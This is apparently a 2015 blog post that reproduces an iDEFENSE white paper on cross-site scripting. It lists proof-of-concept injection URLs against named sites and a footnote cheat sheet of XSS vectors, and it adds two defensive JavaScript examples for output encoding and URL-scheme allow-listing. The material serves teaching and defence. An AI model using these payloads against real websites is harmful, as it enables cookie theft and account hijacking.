BLACK HAT


Wednesday 24 June 2015

XSS ATTACK!

Cross-Site Scripting (XSS) vulnerabilities are very often misunderstood and not given the due
concern and attention they deserve by vendors. XSS is the preferred acronym for “Cross-Site
Scripting” simply to minimize the confusion with Cascading Style Sheets (CSS). Simply put, a
web application vulnerable to XSS allows a user to inadvertently send malicious data to him or
herself through that application.
Attackers often perform XSS exploitation by crafting malicious
URLs and tricking users into clicking on them. These links cause client side scripting languages
(VBScript, JavaScript, etc.) of the attacker’s choice to execute on the victim’s browser. XSS
vulnerabilities are caused by a failure in the web application to properly validate user input.
The following are a few actual XSS vulnerability exploits with embedded JavaScript
(highlighted) able to execute on the user’s browser with the same permissions of the vulnerable
website domain [7]:
• http://www.microsoft.com/education/?ID=MCTN&target=http://www.microsoft.com/education/?ID=MCTN&target="><script>alert(document.cookie)</script>
• http://hotwired.lycos.com/webmonkey/00/18/index3a_page2.html?tw=<script>alert('Test');</script>
• http://www.shopnbc.com/listing.asp?qu=<script>alert(document.cookie)</script>&frompage=4&page=1&ct=VVTV&mh=0&sh=0&RN=1
• http://www.oracle.co.jp/mts_sem_owa/MTS_SEM/im_search_exe?search_text=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E.

The most common web components that fall victim to XSS vulnerabilities include CGI scripts,
search engines, interactive bulletin boards, and custom error pages with poorly written input
validation routines. Additionally, a victim doesn’t necessarily have to click on a link; XSS code
can also be made to load automatically in an HTML e-mail with certain manipulations of the
IMG or IFRAME HTML tags (much like the Badtrans worm). There are numerous ways to
inject JavaScript code into URLs for the purpose of an XSS attack [10].
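The failure described above, a page reflecting a query parameter such as qu or target straight into its HTML, is easiest to see side by side with the fix. The following is an added example, not code from the white paper or from this blog: a minimal server-side renderer in JavaScript, first in its vulnerable form and then with output encoding applied to every reflection. The example.test host, the page layout and the function names are assumptions; the payload is the one quoted in the example URLs above.

```javascript
// Added example: reflected XSS in a search page, vulnerable and hardened.
// The host, page layout and function names are assumptions; the payload is
// the one quoted in the white paper's example URLs.

// Encode a string for an HTML text node or a double-quoted attribute value.
function encodeHtml(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Vulnerable: the qu parameter is concatenated straight into the markup, both
// as page text and inside a value="" attribute, so "><script>... closes the
// attribute and the tag and the script runs in the site's origin.
function renderSearchVulnerable(qu) {
  return (
    "<p>Results for: " + qu + "</p>\n" +
    '<input type="text" name="qu" value="' + qu + '">'
  );
}

// Hardened: every reflection of untrusted input goes through the encoder for
// the context it lands in (text node and quoted attribute share one encoding).
function renderSearchSafe(qu) {
  const enc = encodeHtml(qu);
  return (
    "<p>Results for: " + enc + "</p>\n" +
    '<input type="text" name="qu" value="' + enc + '">'
  );
}

// Simulate the server reading ?qu=... from the request URL.
function renderFromUrl(urlString, render) {
  const url = new URL(urlString);
  return render(url.searchParams.get("qu") || "");
}

// Crude detector used only to compare the two renderers: does the output
// contain a script element or an inline event handler?
function containsActiveContent(html) {
  return /<script\b/i.test(html) || /\bon\w+\s*=/i.test(html);
}

// Constructed request URL carrying the payload from the page's examples.
const SAMPLE_URL =
  "http://example.test/listing.asp?qu=" +
  encodeURIComponent('"><script>alert(document.cookie)</script>') +
  "&frompage=4&page=1";

if (typeof require !== "undefined" && require.main === module) {
  console.log("vulnerable:\n" + renderFromUrl(SAMPLE_URL, renderSearchVulnerable));
  console.log("hardened:\n" + renderFromUrl(SAMPLE_URL, renderSearchSafe));
}
```

Run with node and compare the two outputs: the vulnerable renderer emits the script element intact, the hardened one emits it as inert text. The encoding is chosen by the context the value lands in; a URL or a JavaScript string context would need a different encoder, which is why a single "filter on input" step is not a substitute for encoding at output time.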
The “Cross-Site” part of XSS refers to the security restrictions that a web browser usually places
on data (i.e. cookies, dynamic HTML page attributes, etc.) associated with a dynamic website.
By causing the user’s browser to execute rogue script snippets under the same permissions of the
web application domain, an attacker can bypass the traditional Document Object Model (DOM)
security restrictions, which can result not only in cookie theft but account hijacking, changing of
web application account settings, spreading of a webmail worm, etc. [11] The DOM [12] is a
conceptual framework for allowing scripts to make changes to dynamic web content and
normally is implemented using the web browser’s security settings, to prevent such things as
malicious websites from retrieving cookie values from other domains.
As mentioned previously, cookie stealing is only one of the many implications of XSS attacks.
By subverting client side scripting languages, an attacker can take full control over the victim’s
browser. This also has more insidious ramifications against users of a web application domain if
the attacker chooses to exploit a vulnerability in the browser in order to gain access to the
underlying operating system.

[10] A sampling of XSS examples taken from http://online.securityfocus.com/archive/1/272037/2002-05-09/2002-05-15/0:
<a href="javas&#99;ript&#35;[code]">
<div onmouseover="[code]">
<img src="javascript:[code]">
<img dynsrc="javascript:[code]">
<input type="image" dynsrc="javascript:[code]">
<bgsound src="javascript:[code]">
&<script>[code]</script>
&{[code]};
<img src=&{[code]};>
<link rel="stylesheet" href="javascript:[code]">
<iframe src="vbscript:[code]">
<img src="mocha:[code]">
<img src="livescript:[code]">
<a href="about:<s&#99;ript>[code]</script>">
<meta http-equiv="refresh" content="0;url=javascript:[code]">
<body onload="[code]">
<div style="background-image: url(javascript:[code]);">
<div style="behaviour: url([link to code]);">
<div style="binding: url([link to code]);">
<div style="width: expression([code]);">
<style type="text/javascript">[code]</style>
<object classid="clsid:..." codebase="javascript:[code]">
<style><!--</style><script>[code]//--></script>
<![CDATA[<!--]]><script>[code]//--></script>
<!-- -- --><script>[code]</script><!-- -- -->
<<script>[code]</script>
<img src="blah"onmouseover="[code]">
<img src="blah>" onmouseover="[code]">
<xml src="javascript:[code]">
<xml id="X"><a><b>&lt;script>[code]&lt;/script>;</b></a></xml>
<div datafld="b" dataformatas="html" datasrc="#X"></div>
[\xC0][\xBC]script>[code][\xC0][\xBC]/script>
[11] See http://www.cgisecurity.com/articles/xss-faq.shtml
[12] http://www.w3.org/DOM

iDEFENSE Inc. iALERT White Paper – PUBLIC RELEASE VERSION
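The vector list in footnote 10 shows why filtering for the literal string <script> is not enough: the script can arrive through an href or src attribute with a javascript:, vbscript:, mocha:, livescript: or about: scheme, with characters entity-encoded (javas&#99;ript) or split by whitespace that the browser ignores. The defensive counterpart is to allow-list the URL scheme after decoding the attribute value in the same order the browser does. The following is an added example in JavaScript, not from the white paper or this blog; the example.test base origin, the function names and the sample inputs are assumptions.

```javascript
// Added example: allow-listing the scheme of a user-supplied link or image URL
// before it is written into an href/src attribute. The base origin, function
// names and sample inputs are assumptions for illustration.

// Decode the entity forms that can disguise a scheme inside an attribute:
// decimal (&#99;), hex (&#x63;) and the few named entities that matter here.
// Browsers decode these before parsing the URL, so the check must too.
const NAMED_ENTITIES = {
  amp: "&", lt: "<", gt: ">", quot: '"', apos: "'",
  colon: ":", tab: "\t", newline: "\n",
};

function decodeEntities(s) {
  return String(s).replace(/&(#x[0-9a-f]+|#[0-9]+|[a-z]+);?/gi, (match, body) => {
    if (body[0] === "#") {
      const hex = body[1].toLowerCase() === "x";
      const cp = hex ? parseInt(body.slice(2), 16) : parseInt(body.slice(1), 10);
      return Number.isFinite(cp) && cp <= 0x10ffff ? String.fromCodePoint(cp) : match;
    }
    const key = body.toLowerCase();
    return Object.prototype.hasOwnProperty.call(NAMED_ENTITIES, key) ? NAMED_ENTITIES[key] : match;
  });
}

// Only these schemes may appear in a link we emit; everything else, including
// javascript:, vbscript:, livescript:, mocha: and about:, is rejected.
const ALLOWED_SCHEMES = new Set(["http:", "https:", "mailto:"]);
const BASE_ORIGIN = "https://example.test/"; // assumed site origin for relative links

// Returns the normalized absolute URL when its scheme is allowed, else null.
function safeUrlForAttribute(raw) {
  let url;
  try {
    // WHATWG URL parsing strips surrounding whitespace and embedded tabs and
    // newlines, the same way the browser will when the link is followed, so
    // " java\tscript:" still resolves to the javascript: scheme here.
    url = new URL(decodeEntities(raw), BASE_ORIGIN);
  } catch (e) {
    return null;
  }
  return ALLOWED_SCHEMES.has(url.protocol) ? url.href : null;
}

// Emits the attribute, falling back to an inert "#" when the URL is rejected.
// The value is attribute-encoded after the scheme check, never before.
function hrefAttribute(raw) {
  const ok = safeUrlForAttribute(raw);
  const value = ok === null ? "#" : ok;
  return 'href="' + value.replace(/&/g, "&amp;").replace(/"/g, "&quot;") + '"';
}

// Constructed inputs modelled on the vectors in footnote 10.
const SAMPLE_LINKS = [
  "javascript:[code]",
  "javas&#99;ript:[code]",
  "java&NewLine;script:[code]",
  " java\tscript:[code]",
  "vbscript:[code]",
  "about:<script>[code]</script>",
  "/education/?ID=MCTN",
  "http://www.w3.org/DOM",
];

if (typeof require !== "undefined" && require.main === module) {
  for (const link of SAMPLE_LINKS) {
    console.log(JSON.stringify(link), "=>", hrefAttribute(link));
  }
}
```

The order matters: entity decoding first, then URL parsing, then the scheme check, and only then attribute encoding of the value that is written out. A check that ran on the raw attribute text would accept javas&#99;ript: because it never sees the colon-separated scheme the browser will eventually execute.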
